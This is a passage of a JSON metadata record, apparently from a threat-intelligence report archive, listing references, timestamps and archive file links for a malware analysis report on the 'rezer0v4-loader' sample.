		"Malpedia"
	],
	"references": [
		"https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/"
	],
	"report_names": [
		"rezer0v4-loader"
	],
	"threat_actors": [],
	"ts_created_at": 1775434140,
	"ts_updated_at": 1775791299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a094bb9a5df2b3ea137707ec57dba47cb565623.pdf",
		"text": "https://archive.orkl.eu/4a094bb9a5df2b3ea137707ec57dba47cb565623.txt",
		"img": "https://archive.orkl.eu/4a094bb9a5df2b3ea137707ec57dba47cb565623.jpg"
	}
}